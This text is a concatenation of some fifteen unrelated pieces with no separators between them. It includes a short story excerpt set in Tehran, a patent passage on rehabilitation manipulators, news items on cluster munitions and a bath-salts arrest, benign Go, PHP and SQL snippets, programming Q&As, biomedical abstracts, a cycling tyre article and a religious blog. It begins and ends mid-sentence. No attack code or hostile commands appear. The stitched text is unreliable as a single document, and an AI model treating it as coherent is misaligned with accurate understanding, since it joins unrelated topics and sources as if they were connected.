that I was infertile. Proving my fertility would cost me dearly and I wouldn't be able to pursue my studies without the mehriyeh. Kimia Khanoum hands me a hot glass of tea. I notice her fingers are stained with ink, though her job is to oversee the filing of papers. "You look like you are thinking very seriously about something. It isn't a good thing, Abaan jan. You'll give yourself wrinkles." I suppress my laughter and her frown breaks into a broad grin, exposing her jagged and gaping teeth. "My mother used to tell me that all the time, I listened to her until I was married. Then I couldn't help thinking so much. Have you been thinking about your husband again?" The tea scalds my lips and then my tongue. She's added too much sugar and my mouth feels sticky and my jaw aches. "I'm thinking about how I'll manage my studies one day." "What is it that you want to study?" "Art, literature, philosophy. Everything." "You might consider the lessons life will teach you instead. You might consider your freedom in exchange for your pride a small price to pay." Kimia Khanoum turns back towards her stack of files and begins to work. I ask her why her hands are stained with ink. She looks at me from over the top of the box she's pulled onto the desk. "Abaan, my girl, my hands are stained with wine." *** After the summer rains finally end and the sun emerges unscathed and proud, Omid takes me to the Zahra Cemetery to sit among the gravestones and mourn the living. Omid spends a lot of time in cemeteries "defiling," he says, "the pious dead" with his heretical presence. Omid spreads a picnic blanket near an old tree whose branches stretch upwards and outwards creating a canopy over our heads. The air carries on it the smell of the city and though I am content with my new life, I miss the salty breezes of the seaside home I knew once. "I called Javad and told him that I would agree to his terms for the divorce. I am going to admit to being infertile and he can keep the mehriyeh." I don't tell Omid that when I told Javad he laughed a low sweet laugh. He told me that I would never be able to forget him or erase his presence from my body. Omid looks up and faces the sunshine streaming through the ancient tree's branches in shimmering columns. "He'll move on, Abaan. He'll marry again and have other children. And you might never have the chance to pursue your studies in this country." "Yes. In the end, I might be left with less than what I began with." I look out across the cemetery. The trees here are lush, luscious. They are loose and heady in the breeze that caresses them. The trees along the shore, along the place where I come from, aren't like these Tehran trees. My trees are turned inward. Their bark is boney and exposed. They battle the wind, resist the sun. They have forgotten. They want to forget. Here, in the graveyard of the city where the dead sleep, I can remember. "Did they have names?" Omid asks. "No. But they had faces and their eyes weren't closed and in my heart, I could hear them speak." For a time we sit sipping tea. Omid unties my headscarf and the wind through my hair feels like rebirth. He can see me now as I truly am and he keeps on seeing me, even as I stand to walk away. In many places, the earth is freshly churned to make room for the newly dead. There are many newly dead in the city now. I walk among the tombstones with bare feet. Small pebbles and dirt stick to my soles. Along a solitary path, far away from where Omid sits, waiting with our tea and bread, I notice great upheavals in the ground, mounds that stretch out and swell. These are the unmarked graves. I imagine the men and women that lay beneath the new earth. I can hear their screaming whispers. They propagate fire. Kafah Bachari Manna is an Iranian American writer. She is currently at work on a collection of short stories and a novel. Artwork by Hadi Ziaadinin. Copyright © 2010 Tehran Bureau
Another application for two degree of freedom manipulators is in the use of rehabilitation robots in order to provide support and/or assistive forces to a patient undergoing rehabilitation. Such manipulators are attached to a body part of the subject and can be used to provide assistive forces and support during a rehabilitation exercise such as gait training. For example, a 2DOF manipulator may be connected to a subject's pelvis to support their weight and provide predetermined gait cues to assist in walking One such manipulator is shown in US2007/0016116. In this document, a pair of pneumatically driven manipulators apply forces to the subject's pelvis with an arrangement of cylinders. In particular, fore-aft movement of the subject is provided by pneumatic cylinders mounted in the fore-aft direction, and lateral movement is provided by laterally orientated pneumatic cylinders. A problem with this arrangement is that the lateral cylinders mean that the manipulator is quite wide. This makes it more difficult to install, and the laterally extending pneumatic cylinders may clash with the subject's arms during normal gait motion. Also, the workspace is quite small compared to the size of the manipulator. A different, known, 2DOF manipulator comprises a 2D Cartesian slideway arrangement in which a carriage is slidable on a first rail in a first direction, which first rail is slideable between two further parallel rails in a second direction, perpendicular to the first. Such systems have certain disadvantages. One disadvantage is that there is a significant amount of equipment surrounding and within the workspace. This is generally undesirable in many applications, as the manipulator and the workpiece or subject may clash, and in the event that the manipulator is used for gait training, the rails may clash with the subject's arms. Another disadvantage with such systems is that sliding joints between components are generally undesirable because they are prone to contamination and wear. Also, in such a system a motor is provided to move the carriage on the first rail. The provision of a motor attached to the first rail, and arranged to move the carriage, means that the first rail has a high inertia, which is undesirable when being moved on the parallel rails.
The United States on Sunday defended its supplies of cluster munitions after Human Rights Watch said the bombs had been used by the Saudi-led coalition in Yemen, while a Saudi spokesman dismissed the HRW report. "We take all accounts of civilian deaths due to the ongoing hostilities in Yemen very seriously," a U.S. Defense Department official told Agence France-Presse. "We call upon all sides to comply with international humanitarian law and to take all feasible measures to minimize harm to civilians." The remarks came after HRW said it had gathered photographs, video and other evidence indicating that cluster munitions had been used in coalition air strikes against the Houthi militia stronghold of Saada province in Yemen's northern mountains in recent weeks. It said that analysis of satellite imagery suggested that the weapons had landed on a cultivated plateau, within 600 meters of populated areas. In comments carried by the Financial Times, Saudi coalition spokesman Brigadier General Ahmed al-Asiri dismissed the HRW report as “incredible.” Asiri said the rights group had “answered its own question” when it noted that the bombs were used to target vehicles, not people. “He declined to comment further on the coalition’s use of such arms, but suggested HRW instead focus on the many rights violations carried out by the Houthi rebels, whom he claimed had been attacking the population and putting people in danger by using civilian infrastructure during the war,” the FT report added. Meanwhile, the U.S. official said Washington was "looking carefully" into the HRW report's claims. The weapon is banned by the Convention on Cluster Munitions but Washington permits its use and export because it boasts an unexploded ordnance rate of less than one percent. Cluster munitions are also prohibited by a 2008 treaty adopted by 116 countries, but not by Saudi Arabia and its coalition partners or the United States. The pointed to that policy to highlight Washington's "stringent requirements." US Defense Department official added that "recipients of such transfers must commit that cluster munitions will only be used against clearly defined military targets and will not be used where civilians are known to be present or in areas normally inhabited by civilians," the official added. "This is obviously a critical element of the policy." [With AFP] Last Update: Wednesday, 20 May 2020 KSA 09:44 - GMT 06:44
package container import ( "strings" ) // IsBridge indicates whether container uses the bridge network stack // in windows it is given the name NAT func (n NetworkMode) IsBridge() bool { return n == "nat" } // IsHost indicates whether container uses the host network stack. // returns false as this is not supported by windows func (n NetworkMode) IsHost() bool { return false } // IsUserDefined indicates user-created network func (n NetworkMode) IsUserDefined() bool { return !n.IsDefault() && !n.IsNone() && !n.IsBridge() && !n.IsContainer() } // IsHyperV indicates the use of a Hyper-V partition for isolation func (i Isolation) IsHyperV() bool { return strings.ToLower(string(i)) == "hyperv" } // IsProcess indicates the use of process isolation func (i Isolation) IsProcess() bool { return strings.ToLower(string(i)) == "process" } // IsValid indicates if an isolation technology is valid func (i Isolation) IsValid() bool { return i.IsDefault() || i.IsHyperV() || i.IsProcess() } // NetworkName returns the name of the network stack. func (n NetworkMode) NetworkName() string { if n.IsDefault() { return "default" } else if n.IsBridge() { return "nat" } else if n.IsNone() { return "none" } else if n.IsContainer() { return "container" } else if n.IsUserDefined() { return n.UserDefined() } return "" }
'I'm a eat you': Crazed naked man high on bath salts threatens to eat police officers as they try to arrest him on golf course Newest 'cannibal': Karl Laventure apparently told police he wanted to eat their faces A 'zombie cannibal' was tasered by police after he charged at them wielding a golf club. Karl Laventure, 21, was believed to be high on bath salts when he tried to attack the officers in Lilburn, Georgia. And after they had managed to subdue him he began threatening to eat them. Laventure appeared out of some woods and was seen running naked around a golf range near Atlanta, swinging a club around his head and screaming. Police said that it took several officers to subdue the man who had 'super-human strength'. 'He came running at us out of the woodline,' officer Ross Hancock told local station WSBTV . At first, they tried using pepper spray to stop him, but that left him undeterred. 'He didn't even wipe his eyes, he just kept them open,' Mr Hancock said of the pepper spray. They then turned to their Tasers and though that momentarily shocked Laventure to the ground, it did not stop him. Trouble: It took several police officers a significant amount of effort to subdue Karl Laventure when he was allegedly high on bathsalts 'We had to Tase him approximately five more times on scene to get him down. It took several officers to hold him down to get him cuffed,' Mr Hancock told the station. A video clip of the June 14 arrest shows Laventure lying face down on the ground, shirtless, mumbling seemingly disconnected thoughts and threatening to eat the faces of the officers. 'He was still talking gibberish, still cussing, still saying he wanted to eat us, eat other people,' Mr Hancock added. The video shows him talking about the deceased rappers Biggie and Tupac, making animal sounds, and continuing to threaten the police officers. Strong: Police sprayed him with pepper spray and shocked him with a taser five times before they were able to get him on the ground Interrupted: Witnesses saw a naked Laventure running around the Atlanta Golf Center on June 14 'making animal noises' 'Among other things he said " I'm'a eat you. I'll eat you, I don't want to eat you but I will,"' one witness told Fox News . Though they controlled him enough to force him to a nearby hospital, he attacked one of the nurses on the scene and another fight ensued. His behavior is being blamed on the use of the synthetic drug called bath salts, which was also linked to previous violent outbursts throughout the country. 'I've never had to encounter somebody who acted like this before, so there's no telling what they may do when they are high on this drug,' Mr Hancock said. There have been a number of 'cannibal' incidents linked to bath salts in recent weeks. Bath salts, a synthetic amphetamine cocktail known as 'the new LSD', was the believed drug of choice for Rudy Eugene, who he chewed off homeless man Ronald Poppo's face in Miami in May.
Q: MVC3 ViewBag not working In my action controller I am setting the following: ViewBag.headerinfo = "ddddddddddd"; ViewBag.Info = "abc"; In my _Layout view I have: <div id="header_infobox"> @ViewBag.Info bbbbb @ViewBag.headerinfo </div> When it comes to dispaly all I see is bbbbb. I can't understand why ViewBag doesn't work. I hope someone can give me advice. Thanks, Melissa A: I had the same problem. For me, it was because I was returning RedirectToAction instead of just returning the View. When you RedirectToAction, it apparently clears out the ViewBag.
<?php /* +-----------------------------------------------------------------------+ | Localization file of the Roundcube Webmail Subscriptions plugin | | | | Copyright (C) The Roundcube Dev Team | | | | Licensed under the GNU General Public License version 3 or | | any later version with exceptions for skins & plugins. | | See the README file for a full license statement. | +-----------------------------------------------------------------------+ For translation see https://www.transifex.com/projects/p/roundcube-webmail/resource/plugin-subscriptions_option/ */ $labels['useimapsubscriptions'] = 'Nur abonnierte Ordner anzeigen';
There is an increasing need for new materials that are both biocompatible and biodegradable for medical use, particularly for drug delivery, therapeutic devices and gene therapy/delivery. Particularly common materials for such applications have been degradable polymers such as polyesters, including poly (L-lactic acid), poly(glycolic acid), and poly(lactic-co-glycolic acid). See Duncan, R.; Ringsdorf, H.; Satchi-Fainaro, R. Adv. Poly. Sci. 2006, 192, 1-8; and Finne-Wistrand, A.; Albertson, A.-C. Annu. Rev. Mater. Res. 2006, 36, 369-395 both incorporated herein by reference. However, these polyesters lack many properties necessary for medical applications, and undergo homogeneous, bulk degradation which is detrimental to the long-term mechanical properties of the material. Degradation rates can also be quite slow—from several months to years. Furthermore, their crystallinity leads to hard materials that deform upon degradation. In contrast, surface eroding polymers, such as polyanhydrides, maintain their mechanical integrity during degradation and exhibit a gradual loss in size. See Gopferich, A.; Tessmar, J. Adv. Drug Deily. Rev. 2002, 54, 911-931; Katti, D. S.; Lakshmi, S.; Langer, R.; Laurencin, C. T. Adv. Drug Deily. Rev. 2002, 54, 933-961; and Kumar, N.; Langer, R.; Domb, A. J. Adv. Drug Deliv. Rev. 2002, 54, 889-91 all hereby incorporated herein by reference.
Comparative distribution of estrogen receptor-alpha and -beta mRNA in the rat central nervous system. Estrogen plays a profound role in regulating the structure and function of many neuronal systems in the adult rat brain. The actions of estrogen were thought to be mediated by a single nuclear estrogen receptor (ER) until the recent cloning of a novel ER (ER-beta). To ascertain which ER is involved in the regulation of different brain regions, the present study compared the distribution of the classical (ER-alpha) and novel (ER-beta) forms of ER mRNA-expressing neurons in the central nervous system (CNS) of the rat with in situ hybridization histochemistry. Female rat brain, spinal cord, and eyes were frozen, and cryostat sections were collected on slides, hybridized with [35S]-labeled antisense riboprobes complimentary to ER-alpha or ER-beta mRNA, stringently washed, and opposed to emulsion. The results of these studies revealed the presence of ER-alpha and ER-beta mRNA throughout the rostral-caudal extent of the brain and spinal cord. Neurons of the olfactory bulb, supraoptic, paraventricular, suprachiasmatic, and tuberal hypothalamic nuclei, zona incerta, ventral tegmental area, cerebellum (Purkinje cells), laminae III-V, VIII, and IX of the spinal cord, and pineal gland contained exclusively ER-beta mRNA. In contrast, only ER-alpha hybridization signal was seen in the ventromedial hypothalamic nucleus and subfornical organ. Perikarya in other brain regions, including the bed nucleus of the stria terminalis, medial and cortical amygdaloid nuclei, preoptic area, lateral habenula, periaqueductal gray, parabrachial nucleus, locus ceruleus, nucleus of the solitary tract, spinal trigeminal nucleus and superficial laminae of the spinal cord, contained both forms of ER mRNA. Although the cerebral cortex and hippocampus contained both ER mRNAs, the hybridization signal for ER-alpha mRNA was very weak compared with ER-beta mRNA. The results of these in situ hybridization studies provide detailed information about the distribution of ER-alpha and ER-beta mRNAs in the rat CNS. In addition, this comparative study provides evidence that the region-specific expression of ER-alpha, ER-beta, or both may be important in determining the physiological responses of neuronal populations to estrogen action.
Reinventing the Wheel: The 25mm Revolution Notice anything fat in photo above? It’s can’t be the riders … nor the spectators. Instead look at the front wheel where Matthew Goss is running a 25mm wide tyre. One trend in bike technology for 2013 is the advent of wider rims and tyres and, accompanying this, the progress of clincher tyres. It’s common to see 25mm width tyres on team bikes today, something that was unthinkable a few years ago. As background it was long thought that the narrower the tyre, the faster it was. Especially when riders faced a time trial wheels could appear with 18mm tyres. These had the advantage of being narrow and so more aerodynamic and because there was less material, lighter too. It wasn’t just for the special stages, much of the bunch would ride on 21mm tyres for the whole year. Once or twice a year things got wider when it came to the Tour of Flanders and Paris-Roubaix. But go back to 2006 and the reliable build-up of George Hincapie’s chances. In a piece looking at his bike there’s talk of 23mm and 26mm for the day. These days Argos-Shimano, Blanco, BMC Racing, FDJ, Omega Pharma-QuickStep, Orica-Greenedge, Radioshack-Leopard and Sky are running 25mm. Why? Well increased grip is one explanation. But there’s more to it. Here’s one reason: We went from 21mm and 23mm to 25mm tyres in the last few seasons; new research shows that 25mm have less rolling resistance and I have the feeling they give more comfort and traction so it’s a win-win situation – Koen de Kort, Argos Shimano speaking to RIDE Cycling Review, Issue 59, p95. Rolling resistance is the resistance encountered for a wheel to roll over obstacles in its way. The smoother the road, the lower the resistance. Unlike aerodynamics this is a linear force that increases in line with speed. Do wider tyres have lower rolling resistance? Probably as they are able to deflect more on the road but it depends on the pressure of inflation. As the wheel rolls over the imperfect tarmac the tyre constantly deflects as it crosses the surface. The diagram comes from Schwalbe and they explain that at the same tyre pressure, a wide and a narrow tyre have the same contact area. A wide tyre is flattened over its width whereas a narrow tyre has a slimmer but longer contact area. The long flatter area is less round so it doesn’t roll so well. In other words the shorter the S-measurment, the rounder the wheel. Bikeradar has more on this. But there’s a new factor as well to explain the adoption of 25mm tyres in the peloton and it’s come through rim design. I think it began with Zipp’s Firecrest models (edit: I was wrong, it was HED, see comments below) which use a wider rim that’s bulbous in profile as the cross-sections above show. The wide profile is supposed to offer improved aerodynamics but what’s certain is the width, the rim is so wide it cannot be swapped easily with a standard rim because the brakes need adjusting. This was evident with BMC Racing earlier this year when they were marking bikes with tape according to what rims they’d got. BMC use Shimano wheels, the Japanese manufacturer is also offering wide rims. The same for Bontrager and we saw Fabian Cancellara in the Tour of Flanders using broad rims from Bontrager. Wide = Strong I have another theory about wide rims. They may offer increased aerodynamics but they are stronger too. Being wider means a larger arch which helps brace the rim against impacts, infact the sidewalls can offer some slight flex outwards. Here the rim can, in a tiny way, act like a tyre to dampen impacts. This is good for pros pounding the cobbles… but even better for manufacturers who get fewer breakages and returns after selling wheels to weighty weekend warriors. Put another way rims might be more sold as more aero but they’re certainly stronger too. Clinchers, a stage to tubeless? Finally a note on the topic. For years clinchers were an inferior product and required a heavier rim because of the sidewalls with hooks. The rim weight remains but because the mass market is dominated by clinchers a lot of R&D has gone into improving them. To the point where they offer lower rolling resistance. We’re now seeing riders using clinchers in time trials because they don’t mind about the wheel weight when they’ve already got a heavy disc on the back wheel. Looking ahead one day perhaps all riders will use tubeless tyres. These have the body of a clincher but there’s no inner tube since the bead forms an airtight seal with the rim. It’s used on some mountain bikes and of course cars but the market is limited for now with road bikes. But if the market can adopt 25mm tyres when once upon a time it would have been unthinkable, who knows? Summary Once reserved for training, touring or Paris-Roubaix, now 25mm tyres are being used by nearly half the World Tour peloton. Increased grip and better rolling resistance come with width. But comparisons with the past aren’t fair because modern casings are much more supple yet lighter, you can have a 25mm model today that would have felt like a tractor tyre a decade ago. Is there a big difference? Probably not but everyone is hunting for marginal gains. The revolution is in the spin of the wheel rather than design, the difference of two millimetres is evolution. Tyre width also also a function of the rim choice, it’s not just a question of glueing on wider tyres. Teams running 25mm are often those with wheel sponsors supplying wide rims. Squads on narrower rims, for example using the Campagnolo Bora, are using 23mm. Tyre pressure, the rubber compound used, the condition of the roads, the tube used inside and more all have their say. But fat tyres are here to stay.
I had never heard of this type of epilepsy, either, until I read your post. I once worked in a very busy store, and there was another young lady employee who had trouble reading, although she did not have PRE. She had much trouble trying to learn how to use the cash register, and was just miserable. She was then able to get a job washing dishes in a nursing home. The last time I talked to her, she was very hsppy, and in fact had just been promoted. There are some jobs out there that don't require reading. Best of Luck to you.
Q: How to replace all non-sequential GUIDs with sequential ones? I have a brown-field SQL Server 2005 database that uses standard, unsorted GUIDs as the majority of the primary keys values and also in clustered indexes (which is bad for performance). How should I go about changing these to sequential GUIDs? One of the challenges would be to replace all of the foreign key values as I change each the primary key. Do you know of any tools or scripts to perform this type of conversion? A: remember that you can only use the newsequentialid() function as a default so create a new table with 2 columns. Insert the key from you original table into this one (leave the other column out it will fill itself) join back to the original table and update the PK with the newsequantialid, if you have cascade update the FKs should update by themselves
--- description: 编译器警告(等级 1)CS1058 title: 编译器警告(等级 1)CS1058 ms.date: 07/20/2015 f1_keywords: - CS1058 helpviewer_keywords: - CS1058 ms.assetid: ed50590c-f130-47c3-976d-322a6c8f996d ms.openlocfilehash: 77097472f95d636a6ebc79a5a86083042a48ca32 ms.sourcegitcommit: d579fb5e4b46745fd0f1f8874c94c6469ce58604 ms.translationtype: HT ms.contentlocale: zh-CN ms.lasthandoff: 08/30/2020 ms.locfileid: "89139120" --- # <a name="compiler-warning-level-1-cs1058"></a>编译器警告(等级 1)CS1058 前一 catch 子句已捕获了所有异常。 引发的所有异常都将包装在 System.Runtime.CompilerServices.RuntimeWrappedException 中 如果 `catch()` 程序块在 `catch (System.Exception e)` 程序块后没有指定的异常类型,此属性会产生 CS1058。 该警告建议 `catch()` 程序块将不捕获任何异常。 如果 AssemblyInfo.cs 文件中 `RuntimeCompatibilityAttribute` 设置为 false,则 `catch (System.Exception e)` 程序块后的 `catch()` 程序块可捕获非 CLS 异常:`[assembly: RuntimeCompatibilityAttribute(WrapNonExceptionThrows = false)]`。 如果此属性未显式设置为 false,则引发的所有非 CLS 异常都作为异常包装,并且 `catch (System.Exception e)` 程序块捕获它们。 有关详细信息,请参阅[如何捕捉非 CLS 异常](../../programming-guide/exceptions/how-to-catch-a-non-cls-exception.md)。 ## <a name="example"></a>示例 下面的示例生成 CS1058。 ```csharp // CS1058.cs // CS1058 expected using System.Runtime.CompilerServices; // the following attribute is set to true by default in the C# compiler // set to false in your source code to resolve CS1058 [assembly: RuntimeCompatibilityAttribute(WrapNonExceptionThrows = true)] class TestClass { static void Main() { try {} catch (System.Exception e) { System. Console.WriteLine("Caught exception {0}", e); } catch {} // CS1058. This line will never be reached. } } ```
Q: What's the best way to convey that I'm not a toff (rich kid)? Meaning I'm trying to convey is: I am not the kid who himself and whose parents knew from the very birth that he is going to study in prestigious school. Because he is from fancy family, several generations of which were studying in this school etc. Does sentence "I'm not the one who was born to study at Ivy League school." conveys the message appropriately? Or it implies that that I'm somehow not good enough? Is there a better way to convey the message with reference to the school briefly? A: There is a specific idiom for this: "legacy admissions". According to Wikipedia, Legacy preferences or legacy admission is one of the types of preference given by an institution or organization to certain applicants on the basis of their familial relationship to alumni of that institution. (Students so admitted are referred to as legacies or legacy students.) Searching Google, you can find many people who say about themselves, I wasn't a legacy or I'm not a legacy to mean what you're trying to say. Using the present tense means one is a current or prospective student, while using the past tense means one is a former student. Because "legacy" has other meanings, you should make sure to include enough surrounding context so that people know you're talking about school.
Novelty: Only six genes are used to diagnose and predict the reoccurrence of breast cancer versus 16 to 70 genes. Broadly applicable as the test is not specific to a certain type of breast cancer. The six gene model is also applicable to lung cancer and was tested in six lung cancer data sets. May also be applicable in other cancers Clinical Application: Can be used when patients have been diagnosed with cancer to predict disease progression and, therefore, guide treatment decisions. A future application could also be to identify new therapeutics for breast cancer. Since it works in breast and lung cancer, the test has potential to work in other tumor types as well General Description Several tests are available to help improve the prediction of patient survival upon diagnosis of breast cancer. These prognostic tests assist the decision-making process for cancer treatment by allowing physicians to identify patients who are at low risk of recurrence. The currently available tests examine the activity levels of 16 to 70 genes. NCI researchers have developed an assay for the diagnosis and prognosis of cancer patients that requires evaluating the activity levels of only six genes. The six gene signature they have identified is novel and independent of the genes used in the existing breast cancer prognostics and is broadly applicable to breast cancer rather than specific types or stages. The six-gene model has the same utility as those which measure the expression of a larger number of genes, but offers the advantage of being a more portable test because it allows for multiplexing which could possibly transform into a hospital-based test. The availability of this technology may also result in lower costs for the currently available, expensive assaysScientific Progress Using a mouse model of breast cancer, the inventors established a method to predict the outcome for human breast cancer patients by measuring the levels of six identified genes. The six gene test was then validated against publically available datasets obtained from previously conducted human clinical trials. In three datasets tested, there was a significant association between the six-gene model and relapse-free survival in two of the data sets (n = 159, P = 0.009; n = 179, P = 0.03) and overall survival in the third dataset (n = 176, P = 0.018). More recently, the 6-gene-model was validated for cancers other than breast using multiple, independent, publicly-available human lung cancer datasets. This technology has a potential use as a tool for cancer diagnosis and prognosis for breast, lung and potentially other cancer types. It also has potential as a cancer treatment target for therapeutic agents that are able to alter the activity of one of the six identified genesStrengths Increased portability over currently available assays as it allows for multiplexing Independently validated against three public data sets, independent of its training data sets Novel gene signature, independent of those in currently available assays May also have utility in cancer types other than breast Weaknesses The assay needs a comparative analysis with existing assays All data has been obtained retrospectively. A prospective clinical validation is still needed Testing a prognostic test in human subjects has some restrictions that could make meeting clinical endpoints difficult Patent Status U.S. Patent Application No. 13/148,851, filed August 10, 2011; Google Patent Relevant Publication He, M.; et al. Clin Cancer Res, 2010, 16(1): 249-259 [PubMed ID: 20028755] Inventor Bios Steven K. Libutti, M.D., FACS Dr. Libutti is the Director of the Montefiore-Einstein Center for Cancer Care, Professor and Vice-Chairman of the Department of Surgery and Professor in the Department of Genetics at the Albert Einstein College of Medicine and the Montefiore Medical Center. He graduated from Harvard College and received his M.D. from the College of Physicians and Surgeons of Columbia University. Following his residency in Surgery, he completed a fellowship in Surgical Oncology and Endocrine Surgery at the National Cancer Institute (NCI) and was ultimately a tenured Senior Investigator and Chief of the Tumor Angiogenesis Section in the Surgery Branch, NCI. Dr. Libutti’s laboratory has focused on studies of the pathogenesis of neuroendocrine tumors and on the familial cancer syndromes MEN1 and vHL. His group developed some of the first mouse models of these conditions. Dr. Libutti has received funding from both the intramural and extramural programs of the NCI since 1996. He has published over 240 peer reviewed journal articles. He is the recipient of both NCI and NIH Director’s Awards. Dr. Libutti’s clinical interests are in endocrine and neuroendocrine tumors involving the thyroid, parathyroid, adrenal glands and pancreas. His laboratory developed some of the first genomics based diagnostic and prognostic assays for cancer. He is also a leader in regional cancer therapy and tumor targeted gene therapy. Dr. Libutti conducted the first clinical trial of tumor targeted colloidal gold nanoparticles in cancer patients. He has translated work from his laboratory to the clinic and currently holds seven US patents and has four patents pendingMei He, M.D. Dr. Mei He received her MD from Tianjin Medical University in China. She then worked as a Surgeon and Researcher in Tianjin Cancer Hospital and Cancer Research Institute. After relocating to the United Stage, she worked as a research associate in Dr. Edison Liu’s lab in Lineberger Comprehensive Cancer Center at University of North Carolina at Chapel Hill and later moved to the NIH with Dr. Liu where she worked as a Biologist and Lab manager. She focused on conducting and developing new experimental techniques in molecular biology research and detecting genetic alteration in breast cancer. She moved to Dr. Steven Libutti’s lab in the Surgery Branch within NCI where she was heavily involved in tumor angiogenesis studies; gene expression profiling; identification of gene signatures in human cancer; functional characterization of human genes and molecular biomarker for clinical screening and early diagnoses and prevention on cancer. Dr. He is currently working at NCI in the laboratory of Dr. Electron Kebebew. Her research interests include identification of candidate diagnostic and prognostic markers for endocrine malignancies; identification of novel classes of drugs with anticancer activity in thyroid cancer and adrenocortical carcinoma cells, then translating the findings into clinical trials, as well as clinical and genetic studies in familial non-medullary thyroid cancer. Some of her work has been published in over 30 peer reviewed journal articles and book chapters
Q: How to retrieve PL/SQL record type in SQL? A shared package exists which defines a student record type and a function which returns a student: CREATE OR REPLACE PACKAGE shared.student_utils IS --aggregates related data from several tables TYPE student_rec IS RECORD ( id student.id%TYPE, username student.username%TYPE, name student.name%TYPE, phone phone.phone%TYPE /*etc.*/ ); FUNCTION get_student(student_id IN student.id%TYPE) RETURN student_rec; END; Now, I'm writing a package that provides a API for an Apex application to consume. In particular, I need to provide the student record and other relevant data in a format that can be selected via SQL (and displayed in a report page in Apex.) So far I've been trying to find the most direct way to select the data in SQL. Obviously, a record type cannot be used in SQL, so my quick-and-dirty idea was to define a table type in my package spec and a PIPELINED function in my package spec/body: CREATE OR REPLACE PACKAGE my_schema.api IS TYPE student_tab IS TABLE OF shared.student_utils.student_rec; FUNCTION get_all_student_data(student_id IN student.id%TYPE) RETURN student_tab PIPELINED; END; / CREATE OR REPLACE PACKAGE BODY my_schema.api IS FUNCTION get_all_student_data(student_id IN student.id%TYPE) RETURN student_tab PIPELINED IS BEGIN PIPE ROW(shared.student_utils.get_student(student_id)); END; END; ...which lets me select it like so: SELECT * FROM TABLE(my_schema.api.get_all_student_data(1234)); This works, but building a pipelined table just for one row is overkill, and Oracle's explain plan seems to agree. Supposedly in Oracle 12c, there should be more options available: More PL/SQL-Only Data Types Can Cross PL/SQL-to-SQL Interface ...but I can't seem to figure it out in my scenario. Changing the function to: FUNCTION get_all_student_data RETURN student_tab IS r_student_tab student_tab; BEGIN r_student_tab(1) := shared.student_utils.get_student(student_id); RETURN r_student_tab; END; ...will compile, but I cannot SELECT from it as before. OK, enough rambling, here's my actual question - what is the most direct method to call a PL/SQL function that returns a record type and select/manipulate the result in SQL? A: The killer line in the documentation is this one: A PL/SQL function cannot return a value of a PL/SQL-only type to SQL. That appears to rule out querying directly from a function which returns a PL/SQL Record or associative array like this: select * from table(student_utils.get_students(7890)); What does work is this, which is technically SQL (because the docs define anonymous blocks as SQL not PL/SQL): declare ltab student_utils.students_tab; lrec student_utils.student_rec; rc sys_refcursor; begin ltab := student_utils.get_students(1234); open rc for select * from table(ltab); fetch rc into lrec; dbms_output.put_line(lrec.name); close rc; end; / This is rather lame. I suppose there are a few times when we want to open a ref cursor from an array rather than just opening it for the SQL we would use to populate the array, but it's not the most pressing of use cases. The problem is Oracle's internal architecture: the kernel has C modules for SQL and C modules for PL/SQL (this is why you will hear people talking about "context switches"). Exposing more PL/SQL capabilities to the SQL engine requires modifying the interfaces. We can only imagine how difficult it is to allow the SQL compiler to work against the definitions of PL/SQL data structures, which are extremely unstable (potentially they can change every time we run create or replace package .... Of course this does work for PIPELINED functions but that's because under the bonnet Oracle creates SQL types for the PL/SQL types referenced in the function. It cannot create objects on the fly for an arbitrary function we might wish to slip into a table() call. Some day it might be possible but just consider this one sticking point: what happens when a user who has execute on our package but lacks CREATE TYPE privilege tries to use the function?
Tuesday, September 13, 2011 Back to school! A fresh start, new notebooks and pens, some new clothes, shoes, and a change in the weather make this a favorite time of the year for me. Since my kids start back waaaay before Labor Day, we're well into it now, and they've all even had tests. Tests are and never were my favorite. As much as I loved school, it took me a long time--really until college--to learn how to be a good student, and how to study for tests. After a message at church a few weeks ago about Joseph (the one with the pretty coat) the idea of tests and testing has been on my mind. After he as appointed a big wig in Egypt and he saved Egypt from a famine, his brothers came to see him, not knowing he was him. Following so far? It says in Genesis (a great story, starting at chapter 37) that Joseph tested his brothers. And at church, our pastor suggested that Joseph's character can be seen as a God role, and the brothers would be us in the story. I thought, "hmmm. God tests us? Does it say He does that?" I've heard about Job, where God allowed Satan to test him, but I never considered God being the tester. I did a search of the word "test" in the whole Bible. (Careful there, the search brought up any word with test in it, so there's some rules about testicles in Leviticus. Learning something everyday! blech.) God is indeed a tester. He tested Abraham, He tested the Israelites in the desert, He tested the men who wanted to go into battle with Gideon, He tested Hezekiah, to see what was really in his heart. That's all in the Old Testament, you say? True, but God is unchanging. In the New Testament, we can read that there will be a sorting or separating of wheat from chaff. That sounds like some testing will be involved. (Luke 3:17) How about this little passage from Paul: "Anyone who builds on that foundation may use a variety of materials—gold, silver, jewels, wood, hay, or straw. But on the judgment day, fire will reveal what kind of work each builder has done. The fire will show if a person’s work has any value. If the work survives, that builder will receive a reward. But if the work is burned up, the builder will suffer great loss. The builder will be saved, but like someone barely escaping through a wall of flames." (I Corinthians 3:12-15 NLT) And James tells us, "Dear brothers and sisters, when troubles come your way, consider it an opportunity for great joy. For you know that when your faith is tested, your endurance has a chance to grow. So let it grow, for when your endurance is fully developed, you will be perfect and complete, needing nothing." (James 1:2-4 NLT) When Jesus came to earth and lived as a human, He had a fully human experience, and was also tested. He spent 40 days in the desert and was tempted by Satan. (Luke 4: 1-13) Being late in the game at figuring out how to test well in school, I want to get these tests of my heart right. I believe Jesus showed us by example how to take and pass the tests. Every time Satan spoke to Jesus, His reply began, "The Scriptures say..." I must know the Word, I must remember the Word, I must say the Word, and repeat the promises that I know are true, because they're in the Word. Thursday, May 12, 2011 I heard some discussion on the radio about folks predicting Jesus will be returning on some near specific date. Didn't hear the exact date, sorry to let you down, I wish there was a rewind button on my radio. Maybe in 2012, just like the movie that came out last year? This disturbs me. I remember in 1988, there were lots of Christians believing it would happen that fall. It disturbed me then, too. So much so that I quit going to my college classes, and spent all my time hanging out with friends, doing what I wanted to do, and not doing anything that I needed to do. There were some costly consequences for my poor decisions that fall, and still more than 20 years later, I examine how I let myself believe my own lies.... I wonder how this kind of talk is impacting young people today. Is it changing their perspective? I just finished a book that took place during the Blitz in WW2, and people living in London during that time must have thought the end was in front of them (and indeed for millions of people, their world literally WAS shattered). In a time of war, survival is all that drives people. Taking classes, making a living, looking good, taking care of mere possessions, none of this matters. Some of the things that we think are important become so small. What does a young person today think is important while there is chatter in the background of life about 2012? (and I'm not talking about the Presidential election, yawn yawn.) Regardless of how we think it's all going to come to an end, how are followers of Christ 